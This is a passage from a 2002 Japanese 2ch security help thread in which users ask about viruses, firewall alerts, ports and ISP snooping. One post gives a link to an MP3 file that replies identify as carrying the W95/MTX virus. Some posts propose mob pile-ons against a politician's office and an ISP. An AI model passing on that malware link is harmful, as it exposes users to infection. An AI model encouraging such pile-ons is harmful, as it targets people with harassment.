>>545 さんはマルチですか?
それともたまたまそうなっただけですか?

548 :名無しさん@お腹いっぱい。:02/01/27 23:28
だってどのスレも一人も答えてくれないんだもん・・・

549 :名無しさん@お腹いっぱい。:02/01/27 23:34
>>548
マルチしたからだろ
回答がすぐさま返ってくるとでも思ってるのか?
最低半日待てよ

550 :名無しさん@お腹いっぱい。:02/01/27 23:37
複数のスレで同じ質問見ると答える気なくなるよな〜

551 :530:02/01/28 03:36
>>538

パソコン暦はPC-6001からですが何か?

遅レス御免

552 :名無しさん@お腹いっぱい。:02/01/28 03:53
>>551
セキュリティ厨房、死んでくれ。

553 :名無しさん@お腹いっぱい。:02/01/28 03:53
>>551
いつまでたってもスキルがアップしないやつってことよ
よう じいさん

554 :名無しさん@お腹いっぱい。:02/01/28 08:40
すいません、質問なんですが、トロイを仕込まれているか調べるにはどんなサイト・
ソフトを使えばいいのでしょうか。

555 :名無しさん@お腹いっぱい。:02/01/28 09:19
>>554
ノートンかバスターを使え 買ってこい

556 :http://nara.cool.ne.jp/mituto:02/01/28 10:08
3月24日〜27日に立命館大学BKCに田中洸人氏が来ます。
http://210.172.69.179/jps_search_02au
http://nara.cool.ne.jp/mituto

557 :ウィルスくらっただよ ◆NZPlYSK2 :02/01/28 11:03
madokaにひっかかってしまいました。

windows2000なんですが手動で削除しようとして
C:をmadoka.exeとozawa.exeで検索したんですが全然ひっかからないんです。
win.iniとsystem.iniも見てみたんですがrun=って項目が見当たらないようです。
windows2000は削除方法が違うんですか?




558 :名無しさん@お腹いっぱい。:02/01/28 11:27
>>557
トレンドマイクロのページを見て対処

ウイルス対策ソフトを持ってなさそうなので買ってこい

559 :名無しさん@お腹いっぱい。:02/01/28 11:51
>>555
バスターってなんですか?
アンチウイルスソフトとファイヤーウオールソフトどっちを買えばいいのでしょう?


560 :名無しさん@お腹いっぱい。:02/01/28 12:03
>>559
ウイルスバスター

たいていはパックで売ってるから両方買え

561 :名無しさん@お腹いっぱい。:02/01/28 13:41
アタックやハックをされているか心配ならコマンドプロントで見てみろといわれ
チェックをしてみていたのですが、その中に覚えのないアドレスが見つかりました。
そのアドレスの入ってるようなHPも開いていないし覚えがないんですが
これがアタックされているということなのでしょうか。
ESTABLISHEDと出ていました。どうやって見れば良いのでしょうか。


562 :名無しさん@お腹いっぱい。:02/01/28 14:06
>>561
ファイヤーウォールを入れてみろ
が正解だな

それはポートが開いているかどうかのコマンドをいれたんだろ

563 :名無しさん@お腹いっぱい。:02/01/28 15:19
>>561
メル鯖かどっかのHP見たときの広告の鯖じゃないかな。
心配なら書いてみ。ポートも

564 :_:02/01/28 15:24
HackTrackerってファイヤーウォールソフトの
traceneがカコイイっていうんで調べたら
日本語の製品版が出てないみたいなんですけど
入れてる方いますか?
イイっすか?

565 :561@ありがとうございます。:02/01/28 15:31
netstat -aと入れてみました。サーチ使って調べたら直前に見ていたHPらしく安心しました。
ファイヤーウォールはゾーンアラームを入れてるのですが(フリー版)
やっぱりノートンなどを買って入れた方が良いのでしょうか。
それからアドレスのあとに「:HTTP」などと出ますよね?
あれが違うものだとまずかったりなどとあるのですか?

566 :よろしこ:02/01/28 15:40
アジア太平洋ネットワーク情報センター株式会社(APNIC)の詳細キボー
なんか2chと関係あり?2chやってるとアタックにこられるのですが...?
よろしこ

567 :566:02/01/28 15:43
調査依頼したほうがいいですかね?

568 :名無しさん@お腹いっぱい。:02/01/28 15:47
無駄かと...?>>567

569 :567:02/01/28 15:48
よく解かりました。ありがとう。

570 :名無しさん@お腹いっぱい。:02/01/28 15:57
>>566
それって2ch.netをWHOISしたことを言ってるんだろうなぁ・・(ボソッ

2chのプロクシポートチェックです。プロクシ経由の書き込みをはじくための。

571 :名無しさん@お腹いっぱい。:02/01/28 16:12
すいません。
会社からなんで過去ログ参照できなくて・・・
厨な質問させてください。
ZoneAlarm入れたら「iana.orgからのアクセスをブロックした」
って言われたんですが、iana.orgって何者ですか?

ガクガクブルブル

572 :名無しさん@お腹いっぱい。:02/01/28 16:29
>>571
IANA
http://www.iana.org/

http://www.e-words.ne.jp/view.asp?ID=531

573 :571:02/01/28 16:36
>>572
どーしよーもない質問の解答、ありがとうございます。
安心しました。もっと勉強せねば!


574 :名無しさん@お腹いっぱい。:02/01/28 16:41
へ??
何故にIANA??
勝手に予約済みポート、別のサービスで使用してると怒られるの??

575 :名無しさん@お腹いっぱい。:02/01/28 16:42
何をブロックしたのかは不明・・

576 :名無しさん@お腹いっぱい。:02/01/28 16:50
RFC1918の事じゃないのかな?前もどこかで見かけたような。
プライベートIPアドレスからのアクセスをianaと表示する、
PFWがあったような。無かったような。

577 :名無しさん@お腹いっぱい。:02/01/28 17:00
>>576
ってことは実際にiana.orgからなにか来てるわけではないと、誤報と考えてもいいわけだ。

578 :名無しさん@お腹いっぱい。:02/01/28 17:06
教えてください。
プロバイダ−は会員のメ−ルなどをいかなる
場合であろうとも、覗き見すると
プライバシ−の侵害で刑事責任を問われるのでしょうか?

579 :名無しさん@お腹いっぱい。:02/01/28 17:13
>>578
覗き見ますよ、って会員規約に書いてたらOKじゃないか?w

見られたくなければPGPを使う

PGPってすごく良いの?
http://pc.2ch.net/test/read.cgi/sec/1001427071/

580 :名無しさん@お腹いっぱい。:02/01/28 17:15
いきなりダイアログが出てきて、IPアドレスxxx.xxx.xx.xxxはハードディスク
のアドレスxx:xx:xx:xx:xxと競合していることが検出されました。
と出てきたのですが、これはどういう状況が起きているんでしょうか?
どなたか教えて頂きたい(T_T)

581 :578:02/01/28 17:29
普通は見てもいいのでしょうか?

582 :名無しさん@お腹いっぱい。:02/01/28 17:33
>>577
不遇にもianaからHybrisが届いちゃった人を知ってるので、
絶対無いとは言い切れないけど(w

LAN組んでる人でアドレス偽装するなり
チマチマ変更する根気のある人はどう表示されるかレポートきぼんぬ。
10.0.0.128
172.16.0.128
192.168.0.128
0.0.0.128
169.254.0.128
192.0.2.128
224.0.0.128
240.0.0.128

583 :名無しさん@お腹いっぱい。:02/01/28 19:19
>>580
書いてある通り
OSもPC環境も不明なので何も教えられない

584 :名無しさん@お腹いっぱい。:02/01/28 19:22
>>581
見ようと思えば見れるけど 見る奴はいない
でもメールのパスワードがそのままだったらいたずら好きの社員がこっそり見てるかもね

そんなこと言ったらNTTはすべての通話を社内で聞くことができる
ってことにもなるな

585 :名無しさん@お腹いっぱい。:02/01/28 19:27
>>581
>普通は見てもいいのでしょうか?

プロバイダ社員さんハケーン!!

586 :名無しさん@お腹いっぱい。:02/01/28 19:37
>>578
ヘッダは宛先と同義と解釈されるから管理者なら見ても問題ない(らしい)。
本文を無断で見るのは難しいかもねえ。
root宛てにエラーメールが大量に届く事はあるけど、
これは見ても問題無いハズ。(他に見るひと居ないし)


587 :名無しさん@お腹いっぱい。:02/01/28 19:44
まだ大手なら数も多くてあれだけど、ちいさいプロバイダならちょっと怖いねぇ・・

588 :名無しさん@お腹いっぱい。:02/01/28 19:59
板違いだったらごめんなさい。初めて書き込みます。
うちはCATV接続でウィルスバスター2002を入れてます。
お正月明けから同じIPからのアクセスがFWのログに貯まってます。
1日に時間を変えて10回以上port1027へアクセスしてるようです。
全てクローキングになっているので問題はありませんが…。
検索で調べたのですがport1027が何をするところなのかよく分かりませんでした。
IPの上6桁がうちと同じなので同じプロバイダのユーザーと思われます。
相手がセキュリティ対策をしてないということなのでしょうか?
契約プロバイダではセキュリティを導入していないユーザーには、苦情が集まれば
対策をとるように指導しているようなのですが…。
連絡した方が良いのでしょうか?
あとport1027に関しても教えていただけたら嬉しいです。
初心者ですみませんがよろしくお願いします。



589 :名無しさん@お腹いっぱい。:02/01/28 20:18
>>588
君が狙われてるのでは?
もしくは相手がトロイなどに感染してて気がついていないと言う可能性もあるけど
毎日同じとこからくるようならCATV会社に言え


590 :名無しさん@お腹いっぱい。:02/01/28 20:18
>>588
それはホントにアクセス「されてる」のかい?
アクセス「してる」んじゃ無いのかな?
だとしたら、「至急対策お願いします」って言ったら、
自分がネットできなくなるかもね(w

591 :名無しさん@お腹いっぱい。:02/01/28 20:43
>>588
port1027はウェルノウンポートじゃないし特になにかに使われるポートではなさそう。
http://www.iana.org/assignments/port-numbers

あんまりしつこいようならプロバイダに連絡した方がいいかも。

592 :名無しさん@お腹いっぱい。:02/01/28 20:44
>>552>>553 は人間性が厨房らしい…

593 :588:02/01/28 20:59
>>590
受信/送信の所は「受信」、プロトコルは「UDP」になってます。
この場合でもうちからアクセスしてる場合があるのでしょうか?
一応定義ファイルの更新とスキャンは2,3日おきにやってますが問題ないようです。

>>591
port1027は特別なことに使われる所ではないのですね。
もう少し様子を見て連絡するかどうか、検討することにします。

皆さん、どうもありがとうございました。


594 :名無しさん@お腹いっぱい。:02/01/28 21:31
>>593
まさかソースポートが53じゃねーだろーな。


595 :(゜▼゜*):02/01/28 21:53
>>593
それはウィルスバスターのファイアーウォールの
セキュリティレベルを「高」にしてるのでは?

http://eazyfox.tripod.co.jp/Firewall/VirusBas/VB2002/VirusB021.htm
…によれば、
「高」…クローキングによるアクセス制限
自PCからのアクセス以外は遮断する。
つまり外部からのアクセスは許可しない。

…となってますが、
UDPの場合元々コネクションレス(投げっぱなし)のプロトコルなので、
外部からのアクセスなのか、それとも自分から要求した返答パケットなのか、
判断のしようがないのですよ。
だから、たとえ必要な返答パケットであってもブロックされますし、
当然許可されてないアクセスとしてログにも記録されるハズです。

ウィルスバスターの場合ポート毎の設定は無理のようですし、
3段階のセキュリティレベルを一段階下げるぐらいしか方法はありませんが。


596 :名無しさん@お腹いっぱい。:02/01/28 22:27
自分のPCには今何もセキュリティソフト入ってないんですけど
危ないでしょうか?
NIS2002が、相性が悪いらしくアンインストールしてしまいました。
ウイルスバスターとか、買ったほうがいいでしょうか?
それとも、ウィルススキャンとか・・・。
ああ・・、もう貯金が・・。
失敗が恐くて変えません。いまだにウィンドウズ98なんです・・。


597 :名無しさん@お腹いっぱい。:02/01/28 22:29
損害賠償で破産する前になんらかの対策を取る事をすすめます。
取り敢えず周りにある英字タイトルのスレを読んで下さい。

598 :名無しさん@お腹いっぱい。:02/01/28 22:33
>>596
相性悪いんじゃなくて、使い方が悪いだけだと思われ

599 :588:02/01/28 22:34
>>594
ソースポート?ごめんなさい、よく分からないのですが送信元ポートのことですか?
送信元ポートは1900です。

>>595
確かにセキュリティレベルは導入当初から「高」にしてます。
その場合、自分が投げたか相手から投げられたか判断がつかないと…。
ただ、バスター導入当初はなくて、最近増えてきたので気になってしまいました。
実害がなければ良しということで、納得した方が良さそうですね。
頑張ってもっと勉強します。ありがとうございました。

600 :初心者:02/01/28 22:56
最近ADSLにしてセキュリティのことが気になってきました。
それでノートンかウィルスバスターを購入しようと思うんですが、
実際どちらの方が使いやすいんでしょうか?
アドバイスしてください。

601 :名無しさん@お腹いっぱい。:02/01/28 23:02
>>600
どっちでも良い
使いやすさは人それぞれ

602 :巡回広報:02/01/28 23:41
新しいウィルスMypartの対策を忘れずに

☆ウィルス情報&質問 総合スレッド☆
http://pc.2ch.net/test/read.cgi/sec/1010948022/l50

603 :名無しさん@お腹いっぱい。:02/01/28 23:57
>>600

>>3
それぞれの専用スレを読んでみては?


604 :名無しさん@お腹いっぱい。:02/01/29 00:07
WIN XPのFWのログにこんなのがあったんですが
ポート番号から先の意味がわかりません。
ルーターでインバウンドTCPはフィルタリングしてるのですが
このログはヤバいのでしょうか?

#Verson: 1.0
#Software: Microsoft Internet Connection Firewall
#Time Format: Local
#Fields: date time action protocol src-ip dst-ip src-port dst-port size tcpflags tcpsyn tcpack tcpwin icmptype icmpcode info

2002-01-27 15:24:29 DROP TCP 211.13.211.2 192.168.0.2 80 3068 40 A 609914560 2141314058 33580 - - -

605 :初心者:02/01/29 00:11
>>601-603
どうもありがとうございます。
いろいろ調べたんですけど、ノートンのSystem Works 2002 Professional
に決めました。

606 :名無しさん@お腹いっぱい。:02/01/29 00:17
>>605
あれはファイアウォールは入ってないよね?
まぁ別に用意すりゃいいけど。
ZoneAlarmかTinyがおすすめ

607 :初心者:02/01/29 00:26
ttp://easyweb.easynet.co.uk/~hiros/virii00/METALLICA_SONG.MP3

さっきこれ踏んじゃったんですけど、どんなウイルスなんですか?


608 :名無しさん@お腹いっぱい。:02/01/29 00:31
セキュ板のみなさんこんばんわ。ニュー速+の住民のものです。
じつは、今日の田中マキコと鈴木ムネオの問題に関してムネヲ氏に講義メールを
送ったヤシがいるのですが、そいつがムネヲサイドから攻撃されているようです。
よろしかったら、対処方法などを教えてください。
問題のスレ
【政治】マキコvsムネヲNGO出席拒否問題総合スレッド-11
http://news.2ch.net/test/read.cgi/newsplus/1012225458/


153 名前:反省汁! 投稿日:02/01/28 23:03 ID:EqXFfr2E
ムネヲに実名&生IPで抗議してから、ずっとこんな感じだよぉ!

Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 61.211.164.0
b. [ネットワーク名] TOK-HOUSE-01
f. [組織名] 衆議院事務局
g. [Organization] House of Representatives Secretariat
m. [運用責任者] TM2065JP
n. [技術連絡担当者] TM2065JP
p. [ネームサーバ] ns1.tok.pnap.net
p. [ネームサーバ] ns2.tok.pnap.net
y. [通知アドレス] support@shugiintv.go.jp
y. [通知アドレス] noc@internap.co.jp
[割当年月日] 2001/11/27
[返却年月日]
[最終更新] 2001/11/28 10:32:08 (JST)
ip-alloc@nic.ad.jp

21時から定期的にアクセスしてきてるよ。
何がしたいのかなぁ?(プッ


609 :名無しさん@お腹いっぱい。:02/01/29 00:31
続き。


255 名前:反省汁! 投稿日:02/01/28 23:16 ID:tRGXb7W5
漏れ>>153なんだけど
マジでアクセスしてきてるんだよ。アクセスログ出しとくよ。
FWIN,2002/01/28,00:42:23 +9:00 GMT,211.162.130.18:3960,61.203.130.199:111,TCP (flags:S)
FWIN,2002/01/28,01:12:23 +9:00 GMT,216.10.244.50:2055,61.203.130.199:6970,UDP
FWIN,2002/01/28,01:13:48 +9:00 GMT,208.36.115.51:1233,61.203.130.199:6971,UDP
FWIN,2002/01/28,21:32:19 +9:00 GMT,61.139.44.66:2160,61.203.135.166:515,TCP (flags:S)
FWIN,2002/01/28,21:33:31 +9:00 GMT,61.211.164.41:12018,61.203.135.166:6970,UDP
FWIN,2002/01/28,21:35:17 +9:00 GMT,61.211.164.41:19310,61.203.135.166:6970,UDP
FWIN,2002/01/28,21:35:39 +9:00 GMT,61.211.164.41:19568,61.203.135.166:6970,UDP
FWIN,2002/01/28,21:52:15 +9:00 GMT,61.211.164.41:25554,61.203.135.166:6970,UDP

何がしたいんだ、衆議院事務局・・・どうしたら祭れるかなぁ?


610 :名無しさん@お腹いっぱい。:02/01/29 00:33
>>607
MTXら。極悪なのら。
トレンドマイクロの2001年度感染報告数NO.1に輝いたろ。

http://www.trendmicro.co.jp/virusinfo/monthly_ranking/mvr2001_12.htm

611 :名無しさん@お腹いっぱい。:02/01/29 00:34
>>607
マルチだね

>>608
勝手にやれ よけいなトラフィックを増やすな

612 :名無しさん@お腹いっぱい。:02/01/29 00:41
>>609
関係ないのも混じってるだろ。。
あとログ晒したヤツもアフォだな。自分のIPアドぐらい隠せよw

613 :名無しさん@お腹いっぱい。:02/01/29 00:44
>>609
盛り上がるのはケッコウだけど…
UDPのInだけじゃホントに向こうから投げたパケットかどうか判らないよ。
そいつのアクセスが原因の返答パケットじゃないのか?

614 :初心者:02/01/29 00:44
>>610,611
う〜、そうなんですか?(涙
対処としてまず何をすればよいんでしょうか?

615 :名無しさん@お腹いっぱい。:02/01/29 00:47
君ら、知識もないのに勝手に盛り上がってるだけダヨ >>608-609

616 :名無しさん@お腹いっぱい。:02/01/29 00:56
>>612
自分のIPアド晒しているのはネタではない事と本人が言ってましたが・・・


617 :_:02/01/29 01:00
今日、感染してたんですけど
JS.EXCEPTION.GEN
JS.SEEKER.A4
ってどんなことされるんですか?

検索したらトロイらしいとはわかったんですが・・・。

618 :名無しさん@お腹いっぱい。:02/01/29 01:18
>>617
ウイルス辞典を見れば分かるかと

619 :名無しさん@お腹いっぱい。:02/01/29 01:22
>>614
私もニュー速で同じの踏んだよ。
ノートン先生のおかげで大丈夫(たぶん、、不安。。。

620 :名無しさん@お腹いっぱい。:02/01/29 01:28
ノートンアンチウイルスver5.0を使っています。
そして今日、オートプロテクトが導入3年目に
して初めて働きまして、W95.MTX.drというのが見つかりました。
その後、検疫という項目の所に追加されました。
特に必要なファイルじゃなかったので、わたしは、項目から
削除を選択したのですが、私の処理の仕方は正しいのでしょうか?
マニュアルを読んでみたのですが、その事についての
記述は薄かったので、少し不安なのですが・・・・。
どなたか詳しいかた、教えて下さい。お願いします。

621 :620:02/01/29 01:31
すいません過去ログ読んでおりませんでした。
私も>>607さんと同じ物を踏んだんです。

622 :名無しさん@お腹いっぱい。:02/01/29 01:32
>>620
それでよい

っていうかそんな古いバージョン使ってていいのか?
定義ファイルは更新してるのか?

623 :620:02/01/29 01:34
>>622
返答ありがとうございます。
定義ファイルは更新できます。
最新のを使っております。

624 :名無しさん@お腹いっぱい。:02/01/29 01:51
なんで踏んじゃうのか分からん。

625 :マッカー:02/01/29 02:26
すみません。
MACを使ってるのですがときどきデスクトップの文字がすべて真っ白になってしまう事があります。
フォルダ名の文字もブラウザの文字もすべて真っ白で読めなくなります。
ウイルスなのでしょうか?
どなたか教えてください。

626 :名無しさん@お腹いっぱい。:02/01/29 03:35
>>625
デスクトップの再構築をやってみな
ウイルスではないと思われ

627 :名無しさん@お腹いっぱい。:02/01/29 07:26
フレッツADSLってゆーか・・・
「フレッツ」ってのは、夜だけじゃなくて昼間も(つまり一日中)
使い放題って事ですか?

628 :名無しさん@お腹いっぱい。:02/01/29 07:26
★浜崎あゆみ、ライブで足の不自由なファンを吊るし上げ★

人気歌手・浜崎あゆみが、ファンに暴言を吐いた。
最前列で座っている足の不自由なファンに対し、
「前の方、座らないで下さ〜い」「どう思う?座ってたよ今!」
「一番前で観てんのに座ってたよ〜?」「感じ悪いね〜」
と、そのファンに暴言の雨あられ。会場はあゆ支持の歓声を上げ、
ついにはそのファンはその場で泣き出してしまう。
あゆは気にせず、自分のニューアルバムの話を切り出した。
このファンは熱心なあゆファンで、当日も最前列に座っていた。

★実際の音声
http://www.geocities.co.jp/Milano-Cat/2976/ayu_CDL_MC.mp3(2.28MB)
http://www.geocities.co.jp/Playtown-Dice/5199/ayu_CDL_MC.mp3(78.8KB)

★実際の映像
ttp://isweb40.infoseek.co.jp/computer/imode85/cgi-bin/up/upload/009.mpg
(直リンだと見えないのでコピペして下さい)

詳しくはこちら↓
http://choco.2ch.net/news/
http://tv.2ch.net/ami/

629 :_:02/01/29 07:32
日付: 2002/01/29 時刻: 6:27:34
未使用ポート遮断機能が通信を遮断しました。 詳細:
インバウンド TCP 接続
リモートアドレス、 ローカルサービスは 216.160.193.39,6699

ノートン先生のログです。
一番新しいものですが、これと同様にポート6699を狙ったものが昨日から何十回もありました。

上に書いたIP以外からも同じポート6699を狙ったアタックを受けています。
こちらのIPを変えてみても同じようなアタックを受けます。
whoisで調べたところKDDIなどが引っかかりました。

これは狙われているのでしょうか。
なぜIPを変えても相手には自分を攻撃できるのでしょう。
6699はトロイ、WINMXで使用されるらしく、少々怖く思っています。

630 :名無しさん@お腹いっぱい。:02/01/29 07:44
「ファイルの内容を0バイトのデータに書き換える」ってウィルスが
あるみたいですけど、OS再インストールの際のバックアップ用に
CD-Rにデータを焼いたら、ファイルはあるけど中身が0バイトってのがありました。
これは単なるCDの焼きミスでしょうか?
それともウィルスに感染したからなのでしょうか?
ちなみに、そのCD-Rの中身は一部上記のような現象になり、
それ以外はちゃんと中身があるものでした。
元データはHDDの中をすべてキレイに消しちゃったのでありません。

631 :ななし:02/01/29 08:05
>>630
ff数字で始まる奴?バグだと思っていたけど。


632 :名無しさん@お腹いっぱい。:02/01/29 09:35
>>627
そう

633 :名無しさん@お腹いっぱい。:02/01/29 09:38
>>629
だろうね
誰かに恨まれてるか適当なIPアドレスを攻撃されてるかのどちらか
ノートン入ってるなら問題ないでしょ

セキュリティが甘いポートを突かれるのは当然のこと


634 :名無しさん@お腹いっぱい。:02/01/29 09:54
ICQではオンラインの相手のIPがわかりますけど、
MSNメッセやYahooメッセでも相手のIPはわかりますか?

635 :名無しさん@お腹いっぱい。:02/01/29 10:59
メーラはOEを使ってます。
受信メールを開かないでもウイルスにやられるってことあります?
もちろんプレビューはOFFにしてあるとして。

636 :名無しさん@お腹いっぱい。:02/01/29 12:18
普段は使わないときは必ず回線切ってますが、
昨日はチャット中に寝てしまいました。
今朝起きて状況を見ると、こんな表示が出てましたが
ブロック出来たと思ってよいのでしょうか?
ウイルスバスターの体験版を使用しております。
      ↓
不正アクセスの送信元:203.75.240.83
不正アクセスの種類:NetBIOS Browsing
送信バイト:18.820.601
受信バイト:319.603:068


637 :名無しさん@お腹いっぱい。:02/01/29 12:30
>>635
メール以外で感染するウイルスもたくさんある

>>636
そう
でもけちけちせずに製品版を買え

638 :635:02/01/29 12:52
>>637
では、メールに限ると、受信しただけで、オープンしなければ
感染は有り得ない?


639 :名無しさん@お腹いっぱい。:02/01/29 12:58
>>638
今のところはそういうウイルスはない

そんなにいやならOE使わなきゃいいのに

640 :578:02/01/29 13:15
実は1年前に住所が移転したのですが、
移転したということをプロバイダ−に届けていなかったのです。
すると先日、プロバイダ−から僕の携帯(知るはずのない)
に以下のような電話がありました。


「現在工事中につきネットを利用できないことを
お詫びします。実はこの件は自宅に郵送させていただいたのですが
、書類が自宅に届かずにこちらへ返送されてきました。
住所の移転をされたようですねえ。それで申し訳ないのですが、
連絡のしようがありませんので、メ−ルを読ませていただいて
携帯電話の番号を調べさせていただきました。」


このような電話がきたのです。プロバイダ−の不手際でネットが
使用できなくなって、それを連絡できないからといって会員のメ−ル
を無断で盗み読みして携帯の番号を調べ出して電話してきたのです。
また住所を移転したといっても同市内での移転であり、
家の電話番号は変更していません。家の電話番号はプロバイダ−
に登録してあるので、連絡事があればとりあえず家に電話
すればいいはずです。また書類を送る場合
でも移転先を調べることぐらいできるはずです。
それなのにそれを連絡できないからといって、会員のメ−ルを無断で
盗み読みして僕が友人たちとやり取りしているメ−ルに書いてあった
携帯番号を見つけ出して電話してきたのです。
これは十分に刑事責任を問えると思うのですがどうでしょう?
分かる方いましたら教えてください。お願いします。

641 :名無しさん@お腹いっぱい。:02/01/29 13:21
>>640
そのプロバイダってどこよ?
すげえ恐いな

電話の内容は録音してあるのか?
だったら十分訴えられる
なんなら2ちゃん内で祭ってもいいと思われ

642 :名無しさん@お腹いっぱい。:02/01/29 13:38
>>634
P2Pなら分かる

643 :名無しさん@お腹いっぱい。:02/01/29 14:11
ブラウザクラッカーって何ですか?

644 :名無しさん@お腹いっぱい。:02/01/29 14:52
643じゃないが、ブラウザクラッカーについて知りたい。
IE使ってると、たまに画面がごちゃごちゃ重なってきて、
読めなくなる。IEの画面だけじゃなく、デスクトップもごちゃごちゃになる。
ネスケを立ちあげると、ネスケの窓内は正常。
これって、クラッカーされてるの?
再起動するとなおるから、気にしてないけど。

645 :名無しさん@お腹いっぱい。:02/01/29 14:55
ナビスコプレミアムクラッカー

646 :名無しさん@お腹いっぱい。:02/01/29 15:00
ブラウザクラッカーって初めて聞いた

647 :名無しさん@お腹いっぱい。:02/01/29 15:18
サイコクラッシャーーーー

648 :名無しさん@お腹いっぱい。:02/01/29 16:59
>>634
>ICQではオンラインの相手のIPがわかりますけど、
バグあったけど対処されてるみたいだよ。
だからサーバー経由ならIPわかりません。
直接続(P2P)ならどうやったってバレるけど。

>MSNメッセやYahooメッセでも相手のIPはわかりますか?
こっちも>>642さんの言うとおりP2P接続ならバレる。
メッセージ送るだけならサーバー経由。
ファイル転送はP2P。


649 : :02/01/29 18:05
>>643-644
いわゆる「ブラクラ」ブラウザクラッシャーのことだとすれば、
ページを見た時にプログラムが実行されて、IEの
「新しいウィンドウを開く」が次々と実行される。
困ったことに、WIN95/98/MEではリソースの制限つうものがあり、
沢山開かれるとほぼ確実におかしなことになる。
たいていはフリーズ(何も受け付けなくなる)だろうな。

2chあたりで、怪しげなURLにリンクがあり、
誰かが「↑ブラクラ」なんて書いているのはこういう意味。

>>644のはそういうブラクラページを見た
(ブラクラ踏んだとかいう)のではなさそうだけど、
要は窓の開きすぎではないかな。
IEは特に沢山開くと表示が遅くなったりおかしくなったりしがち。
OSとの融合性も高いのでデスクトップに影響があるかも。
あんまり沢山開かず、不要な窓を閉じるようにするといい。
(かつある程度使ったら再起動)
ただし、WIN NT/2k/XPだと、あまりそんなことにはならないはずだが。

650 :名無しさん@お腹いっぱい。:02/01/29 18:18
>>648
SOCKS串さす、って方法もあるけど使えるのはなかなかないねぇ・・。

>>649
そうそう、NT系なら実質リソース∞だから、メモリ十分あればブラクラもかなり耐えられる!
グロは無理!

651 :644:02/01/29 21:52
>>649
なるほどね、確かにたくさん窓開くとなりやすい。
ちなみに、Win95のIE4使ってる。
使わないときはサスペンドなんで、再起動は固まったときしかしない。
それらが、原因か。
>>650 グロって何?



652 :名無しさん@お腹いっぱい。:02/01/29 23:48
プロクシのログの取得はどうすればいっすか?

653 :名無しさん@お腹いっぱい。:02/01/29 23:50
( ゚Д゚)ポカーン

654 :名無しさん@お腹いっぱい。:02/01/30 00:00
某プロバイダのスペースで、サイトを開いてます。

ファイルを転送するたびにノートンが
トロイの木馬のデフォルト遮断 のセキュリティ警告を表示しました
リモートコンピュータ(***.***.***.**)という警告を出します。

攻撃元はいつも一緒。あまりにもウザイのでドメインSEARCHで
調べサイトへ飛んでみたら、サイトを開いてる某プロバイダに
行き着いてしまいました。

これって、プロバイダの社員が不正アクセスをしているのでしょうか。


655 :名無しさん@お腹いっぱい。:02/01/30 00:05
>>654
ノートンの誤報
PASVモードにでもしる

656 :名無しさん@お腹いっぱい。:02/01/30 00:13
もう上の方で見飽きてると思いますが質問させて下さい。
大馬鹿なことにニュース速報板でW95/MTX付きMP3へのリンクを
踏んでしまったんですが、感染するとHDD内に作られるという
ie_pack.exe、wid32.dll、mtx_.exeの3ファイルは見つかりませんし
レジストリのRunエントリにもウイルスによる改変はありませんでした。
また、このMP3自体はウイルススキャンソフトがキャッシュから見つけて
削除されたんですが、これ以外のファイルには感染が検出されませんでした。
これはシステムには感染していないと考えてもいいんでしょうか?

657 :名無しさん@お腹いっぱい。:02/01/30 00:17
>>654
ノートンのことはよくわからないが、
FTPはクライアントPCからPort21でサーバと接続した後、
サーバからPort1023以上(Remote Port20)でデータ通信用の
コネクションが来るので、そのポートがたまたまトロイの木馬用に
使われてるポートと重なってた場合に検出されるのではなかろうか?
要するに誤検知くさいと思う。

658 :名無しさん@お腹いっぱい。:02/01/30 00:25
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=PE_MTX.A
↑ここ飛べる??
んなら大丈夫。
踏んだだけなら大丈夫。保存した奴ダブクリしない限り。
但し、ブラウザのキャッシュには落ちてるけど。


659 :名無しさん@お腹いっぱい。:02/01/30 00:30
ああ>>658>>656に対してね。

660 :656:02/01/30 00:34
>>658
そのアドレスには飛べました。キャッシュに入ってたやつは
駆除されたので大丈夫だと思います。
安心しました。レスどうもです。

661 :654:02/01/30 01:14
>>655-657
誤報なんてあるんですね。
狙われてるわけではなかったんだ、よかった。
教えてくださってありがとうございました。

662 :名無しさん@お腹いっぱい。:02/01/30 01:56
掲示板があらされ悔しい思いをしています。

掲示板のソースを見ると
<!-- Remote Host: wa-r01.wa.2iij.net, Time: 1012310051 -->
とありますが、これは生IPなのかそれとも串なのか?

何とかあらしを撃退したいのですが、よい方法をご教授下さい。
尚、私は掲示板の管理人ではありません。

問題の掲示板はここです。

http://6414.teacup.com/shigepero/bbs


663 :名無しさん@お腹いっぱい。:02/01/30 02:05
>>662
もっと硬い板に移転汁。
orもっと硬い板作る。


664 :名無しさん@お腹いっぱい。:02/01/30 02:29
>>662
プロクシかどうかは知らんが IIJ 経由のアクセスだ。
掲示板のログをメールに添付するなどして、相手が IIJ の会員なら
それ相応の処置を、プロクシならアクセスログを提出してもらえ。
それとプロバイダが自前の CGI の設置を許可しているのなら
663が言ってる通り、もっと硬い板を使ったほうがいい。
あるいは .htaccess を置かせてもらえるのなら wa-r01.wa.2iij.net
からのアクセスをキックしてもよい。

荒らしの書き込みは削除しても構わないが、それに反応しては駄目だ。
徹底的に無視しとけ。

Registrant:
Internet Initiative Japan Inc. (2IIJ-DOM)
Takebashi Yasuda Bldg., 3-13 Kanda
Nishiki-cho,
Chiyoda-ku,, Tokyo 101-0054
JP

Domain Name: 2IIJ.NET

Administrative Contact:
Miyoshi, Takamichi (TM003JP-JP) miyoshi@IIJ.AD.JP
Internet Initiative Japan Inc.
Takebashi Yasuda Bldg.3-13
Kanda Nishiki-cho, Chiyoda-ku Tokyo
101-0054
JP
+81-3-5259-6000 (FAX) +81-3-5259-6001
Technical Contact:
Yamaguchi, Jiro (JY331) jiro-y@IIJ.AD.JP
Internet Initiative Japan Inc.
Takebashi Yasuda Bldg.,
3-13 Kanda Nishiki-cho, Chiyoda-ku,
Tokyo
101-0054
JP
+81-3-5259-6000 (FAX) +81-3-5259-6001

665 :名無しさん@お腹いっぱい。:02/01/30 05:22
チャット中誰かにトロイを入れられそうになりました。
ノートン2002がキャッチ。
218.43.203.164
海外の人と複数で話してたのですが(韓国、イタリアなど)
どこの国のIPですか?


666 :ドキンちゃん:02/01/30 05:33
>>665 日本。
http://www.mse.co.jp/ip_domain/index.shtml
Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 218.43.192.0-218.43.223.0
b. [ネットワーク名] OCN
f. [組織名] オープンコンピュータネットワーク
g. [Organization] Open Computer Network
m. [運用責任者] AY1361JP
n. [技術連絡担当者] MO081JP
n. [技術連絡担当者] KK551JP
n. [技術連絡担当者] IM657JP
